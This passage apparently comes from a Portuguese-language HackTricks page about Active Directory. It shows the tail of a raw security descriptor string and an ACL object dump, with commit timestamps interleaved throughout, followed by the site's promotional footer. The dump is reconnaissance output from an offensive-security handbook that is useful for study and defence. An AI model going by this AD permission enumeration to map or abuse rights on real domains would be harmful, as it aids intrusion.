-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967953-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e5350144
Owner : BUILTIN\Administrators
Group : BUILTIN\Administrators
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
WriteExtendedAttributes)...}
SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
(Traverse)...}
2023-12-24 19:01:27 +00:00
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
2023-06-06 18:56:34 +00:00
```
2022-04-28 16:01:33 +00:00
< details >
2024-01-02 21:38:50 +00:00
< summary > < strong > Aprenda hacking no AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
Outras formas de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-02 21:38:50 +00:00
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
* Adquira o [**material oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-02-03 01:32:44 +00:00
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
* **Junte-se ao grupo** 💬 [**Discord** ](https://discord.gg/hRep4RUj7f ) ou ao grupo [**telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >